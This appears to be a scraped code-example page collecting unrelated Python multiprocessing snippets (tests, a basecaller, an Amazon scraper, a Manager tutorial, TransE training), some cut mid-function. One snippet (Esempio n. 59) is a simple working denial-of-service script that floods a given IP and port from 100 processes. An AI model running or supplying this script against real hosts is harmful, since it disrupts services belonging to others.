if __name__ == "__main__":
    try:
        # Keyboard input Process
        KeyInputs = KeyInterrupt()
        KeyProcess = Process(target=KeyInputs.keyInterrupt, args=(1, KeyInputs.key_status, KeyInputs.command_status))
        KeyProcess.start()

        # Main Process 
        main(2, KeyInputs.command_status)
        
        print("terminate KeyBoard Input process")
        if KeyProcess.is_alive():
            KeyProcess.terminate()
    except Exception as e:
        print(e)
    finally:
        print("Done... :)")
Esempio n. 54
0
    def test_concat():
        """
        This function provides means to test the correct functioning of the
        concatenation of the subprocess results.
        """
        def get_data_for_df_test(
            start_date,
            end_date,
        ):
            """
            """
            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Started        ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            #-------------------------------------------------------------------
            test = Multiprocess.test_level
            process_id = 0
            process_instances_ret = []
            queue = JoinableQueue()
            queue_evnt = JoinableQueue()
            date_format = "%m/%d/%Y"

            for date in range(3):
                end_date_o = datetime.strptime(
                    end_date[date],
                    date_format,
                ).date()
                start_date_o = datetime.strptime(
                    start_date[date],
                    date_format,
                ).date()

                process_name = "process_{:03d}".format(process_id)

                process_inst = Velo(
                    process_id=process_id,
                    process_name=process_name,
                    queue=queue,
                    queue_evnt=queue_evnt,
                    date_id=date,
                )

                process = Process(target=process_inst.run)

                process_id += 1
                Multiprocess.process_cnt += 1
                Multiprocess.process_instances.append(process_inst)
                Multiprocess.processes.append(process)

            for i in range(Multiprocess.process_cnt):
                Multiprocess.processes[i].start()

            for i in range(Multiprocess.process_cnt):
                msg_process_id = None
                msg_from_queue = ""
                while True:
                    msg_from_queue = queue.get()
                    msg_stage_id = msg_from_queue[0]
                    msg_process_id = msg_from_queue[1]
                    process_instances_ret.append(msg_from_queue[2])
                    queue.task_done()
                    break

                Multiprocess.processes[msg_process_id].join()

            #status message-----------------------------------------------------
            Multiprocess.logger.debug(
                "{}[{}function       {}]   {}   {}".format(
                    cs.RES,
                    cs.CYA,
                    cs.RES,
                    "{}[Finished       ]".format(cs.WHI),
                    "Multiprocess.test_concat.get_data_for_df_test",
                ))

            return process_instances_ret

        def ds_cmp(
            test_number,
            test_name,
            ds_a_a,
            ds_a_b,
            ds_b,
        ):
            """
            Takes two data structures ds_a_a, ds_a_b, merges them (ds_a) and
            compares ds_a with a third data structute ds_b via comparing their
            md5 hashes.
            """
            def ds_to_list(ds):
                """
                This function transforms a given data structure to a list.
                """
                l_ds = None
                if isinstance(ds, list):
                    l_ds = ds
                elif isinstance(ds, type(ndarray)):
                    Multiprocess.logger.debug(
                        "test #[{}]:  ds_a_a type = {}".format(
                            test_number, str(type(ds_a_a))))
                    l_ds = ds.tolist()
                else:
                    l_ds = ds.tolist()

                return l_ds

            def ds_export(
                ds,
                version,
                test_number,
            ):
                """
                This function can be applied in order to export a given data
                structure to a textfile.
                """
                path_data_output_l = "{}_ds/ds_{}_{}.txt".format(
                    Multiprocess.path_data_output,
                    test_number,
                    version,
                )
                with open(path_data_output_l, 'w') as text_file:
                    text_file.write("{}".format(ds))

                return

            def ds_hash_cmp(
                s_ds_a,
                s_ds_b,
            ):
                """
                This function compute the md5 hashes of two given data structures
                in form of strings and compares them.
                """
                hash_a = md5()
                hash_b = md5()

                hash_a.update(str.encode(s_ds_a))
                hash_b.update(str.encode(s_ds_b))

                s_hash_a = hash_a.hexdigest()
                s_hash_b = hash_b.hexdigest()

                if s_hash_a == s_hash_b:
                    return True

                return False

            path_data_output = Multiprocess.path_data_output
            ds_a = None

            #derive ds_a from a_a and a_b
            ds_a_a_bak = ds_a_a

            if type(ds_a_a) == list:
                ds_a = ds_a_a + ds_a_b

            elif type(ds_a_a) == DatetimeIndex:
                ds_a = ds_a_a_bak.append(ds_a_b)

            elif type(ds_a_a) == str:
                ds_a = "{}, {}".format(ds_a_a[0:-1], ds_a_b[1:])

            else:
                ds_a = concatenate([ds_a_a, ds_a_b])

            s_da_a_a = None
            s_da_a_b = None
            s_da_a = None
            s_da_b = None

            #transform to list
            if type(ds_a_a) != str:
                s_ds_a_a = str(ds_to_list(ds_a_a))
                s_ds_a_b = str(ds_to_list(ds_a_b))
                s_ds_a = str(ds_to_list(ds_a))
                s_ds_b = str(ds_to_list(ds_b))
            else:
                s_ds_a_a = ds_a_a
                s_ds_a_b = ds_a_b
                s_ds_a = ds_a
                s_ds_b = ds_b

            #put each tx in newline
            s_ds_a_a = s_ds_a_a.replace("), Tx(", "),\nTx(")
            s_ds_a_b = s_ds_a_b.replace("), Tx(", "),\nTx(")
            s_ds_a = s_ds_a.replace("), Tx(", "),\nTx(")
            s_ds_b = s_ds_b.replace("), Tx(", "),\nTx(")

            #export to file
            ds_export(s_ds_a_a, "_a_a", test_number)
            ds_export(s_ds_a_b, "_a_b", test_number)
            ds_export(s_ds_a, "_a", test_number)
            ds_export(s_ds_b, "_b", test_number)

            #hashing
            hash_equal = None
            if ds_hash_cmp(s_ds_a, s_ds_b) == True:
                hash_equal = "{}Y{}".format(cs.PRGnBH, cs.WHI)
            else:
                hash_equal = "{}N{}".format(cs.REE, cs.WHI)

            ret_str_pre = "{}[{}testing cat #{}{}]".format(
                cs.WHI,
                cs.PRGnBH,
                test_number,
                cs.WHI,
            )
            ret_str = "{}  {}same: [{}] -- {}{}".format(
                ret_str_pre,
                cs.WHI,
                hash_equal,
                test_name,
                cs.RES,
            )

            Multiprocess.logger.info(ret_str)
            return

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.test_concat",
        ))

        #-----------------------------------------------------------------------
        path_data_output = Multiprocess.path_data_output
        #start_date_a_a = "01/01/2010"
        #end_date_a_a   = "02/01/2011"

        #start_date_a_b = "02/02/2011"
        #end_date_a_b   = "03/01/2012"

        #start_date_b   = "01/01/2010"
        #end_date_b     = "03/01/2012"

        start_date_a_a = "01/03/2009"
        end_date_a_a = "02/01/2010"

        start_date_a_b = "02/02/2010"
        end_date_a_b = "02/01/2011"

        start_date_b = start_date_a_a
        end_date_b = end_date_a_b

        ret = get_data_for_df_test(
            start_date=[start_date_a_a, start_date_a_b, start_date_b],
            end_date=[end_date_a_a, end_date_a_b, end_date_b],
        )

        processes_test = []

        ret_cnt = len(ret[0])
        ret_keys = list(ret[0].keys())
        for i in range(ret_cnt):
            test_number = "{:02d}".format(i + 1)
            i_name = ret_keys[i]

            process = Process(target=ds_cmp,
                              args=(
                                  test_number,
                                  i_name,
                                  ret[0][i_name],
                                  ret[1][i_name],
                                  ret[2][i_name],
                              ))

            processes_test.append(process)

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Started        ]".format(cs.WHI),
            "Multiprocess.test_concat.ds_cmp",
        ))

        #start ds_cmp subprocesses----------------------------------------------
        for i in range(ret_cnt):
            processes_test[i].start()

        for i in range(ret_cnt):
            processes_test[i].join()

        #status message---------------------------------------------------------
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Finished       ]".format(cs.WHI),
            "Multiprocess.test_concat.ds_cmp",
        ))

        #status message---------------------------------------------------------
        print("Exiting Multiprocess test: concat")
        Multiprocess.logger.debug("{}[{}function       {}]   {}   {}".format(
            cs.RES,
            cs.CYA,
            cs.RES,
            "{}[Finished       ]".format(cs.WHI),
            "Multiprocess.test_concat",
        ))

        return
Esempio n. 55
0
def encode(model, opt):
    global read_id_list, log_probs_list, output_lengths_list, row_num_list
    manager = Manager()
    # read_id_list = manager.list()
    # log_probs_list = manager.list()
    # output_lengths_list = manager.list()
    # row_num_list = manager.list()
    encode_mutex = manager.Value('i', 1)
    decode_mutex = manager.Value('i', 1)
    write_mutex = manager.Value('i', 1)

    model.eval()
    call_dataset = CallDataset(opt.records_dir)
    data_iter = Data.DataLoader(
        dataset=call_dataset, batch_size=1, num_workers=0)
    if not os.path.exists(opt.output):
        os.makedirs(opt.output)
    else:
        shutil.rmtree(opt.output)
        os.makedirs(opt.output)
    outpath = os.path.join(opt.output, 'call.fasta')
    encoded_read_num = 0
    for batch in tqdm(data_iter):
        read_id, signal = batch
        read_id = read_id[0]
        signal = signal[0]
        read_id_list.append(read_id)
        signal_segs = signal.shape[0]
        row_num = 0
        encoded_read_num += 1
        while encode_mutex.value != 1:
            time.sleep(0.2)
        for i in range(signal_segs // 10 + 1):
            if i != signal_segs // 10:
                signal_batch = signal[i * 10:(i + 1) * 10]
            elif signal_segs % 10 != 0:
                signal_batch = signal[i * 10:]
            else:
                continue
            signal_batch = torch.FloatTensor(
                signal_batch).to(opt.device)
            signal_lengths = signal_batch.squeeze(
                2).ne(Constants.SIG_PAD).sum(1)
            output, output_lengths = model(
                signal_batch, signal_lengths)

            log_probs = output.log_softmax(2)
            row_num += signal_batch.size(0)
            log_probs_list.append(log_probs.cpu().detach())
            output_lengths_list.append(output_lengths.cpu().detach())
        row_num_list.append(row_num)
        if encoded_read_num == 100:
            encode_mutex.value = 0
            p = Process(target=decode_process, args=(
                outpath, encode_mutex, decode_mutex, write_mutex))
            p.start()
            while encode_mutex.value != 1:
                time.sleep(0.2)
            read_id_list[:] = []
            log_probs_list[:] = []
            output_lengths_list[:] = []
            row_num_list[:] = []
            encoded_read_num = 0
    if encoded_read_num > 0:
        encode_mutex.value = 0
        while decode_mutex.value != 1:
            time.sleep(0.2)
        p = Process(target=decode_process, args=(
            outpath, encode_mutex, decode_mutex, write_mutex))
        p.start()
        p.join()
 def setUpClass(cls):
     global server_process
     server_process = Process(target=start_test_server)
     server_process.daemon = True
     server_process.start()
Esempio n. 57
0
File: am3.py Progetto: xtwxfxk/left5
def start():
    # for file in os.listdir(KEYWORD_PATH):
    #     # print(open(os.path.join(KEYWORD_PATH, file)).readlines())
    #     keywords.extend([k.strip() for k in open(os.path.join(KEYWORD_PATH, file)).readlines() if k.strip()])
    # start_list()
    # start_asins()

    # sa.fetch_product('B09KWZXG2N')

    list_p = Process(target=do_list)
    list_p.start()

    product1_p = Process(target=do_product,
                         args=(('D://profiles//amazon_product'), ))
    product1_p.start()
    product2_p = Process(target=do_product,
                         args=(('D://profiles//amazon_product1'), ))
    product2_p.start()

    sa1 = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    record_p = Process(target=sa1.do_records)
    record_p.start()

    sa2 = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    csv_p = Process(target=sa2.do_csv)
    csv_p.start()

    # executor = ProcessPoolExecutor(max_workers=5)
    # executor.submit(do_list)

    # sa = SpiderAmazon(list_queue, product_queue, record_queue, csv_queue)
    # executor.submit(do_product, 'D://profiles//amazon_product')
    # executor.submit(do_product, 'D://profiles//amazon_product1')
    # executor.submit(sa.do_records)
    # executor.submit(sa.do_csv)

    for file in os.listdir(KEYWORD_PATH):
        try:
            for keyword in open(os.path.join(KEYWORD_PATH, file),
                                'r',
                                encoding='utf-8').readlines():
                list_queue.put(keyword.strip())
        except Exception as ex:
            logger.error(ex, exc_info=True)

    list_p.join()
    product1_p.join()
    product2_p.join()
    record_p.join()
    csv_p.join()
    
"""

# 服务器进程
# Manager()控制器返回的管理器对象控制一个服务器进程,该进程保存Python对象并允许其他进程使用代理操作它们。
# 通过返回的经理Manager()将支持类型 list,dict,Namespace,Lock, RLock,Semaphore,
# BoundedSemaphore, Condition,Event,Barrier, Queue,Value和Array
from multiprocessing import Process, Manager


def f(d, l):
    d[1] = '1'
    d['2'] = 2
    d[0.25] = None
    l.reverse()


if __name__ == '__main__':
    with Manager() as manager:
        d = manager.dict()
        l = manager.list(range(10))

        p = Process(target=f, args=(d, l))
        p.start()
        p.join()

        print(d)
        print(l)

# 服务器进程管理器比使用共享内存对象更灵活,因为它们可以支持任意对象类型。
# 此外,单个管理器可以通过网络由不同计算机上的进程共享。但是,它们比使用共享内存慢。
Esempio n. 59
0
import socket
from time import sleep
import sys
from multiprocessing import Pool, Process


def make_dos(ip,port):
    while True:
        with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
            try:
                s.connect((ip,port))
                s.send(bytes(1))
            except:
                pass
        sleep(0.1)

if __name__ == "__main__":
    ip = sys.argv[1]
    port = int(sys.argv[2])
    for i in range(100):
        p = Process(target=make_dos,args=(ip,port))
        p.start()
    print(f'DOS attack to {ip,port} was started')
    input()
    


        
            'relation_embedding': d[min_id][2]
        })


if __name__ == '__main__':
    if len(os.listdir('../data/train_data2/')):
        num = len(os.listdir('../data/train_data2/'))
    else:
        num = 1
    while num < 7:
        manager = Manager()
        d = manager.dict()
        jobs = []
        for i in range(1, 5):
            path = "../data/FB15k-" + str(i)
            jobs.append(
                Process(target=transe,
                        args=(i, path, 100, 1, 'L1', 10000, 0.003, 12, 12, 50,
                              d)))
        for j in jobs:
            j.start()
        for j in jobs:
            j.join()
        print('--------第{}次---------'.format(num))
        record(d, num)
        num += 1
    # path = "../data/FB15k-1"
    # p = Process(target=transe, args=(1,path,100,1,'L1',10000,0.003,12,12,3,d))
    # p.start()
    # p.join()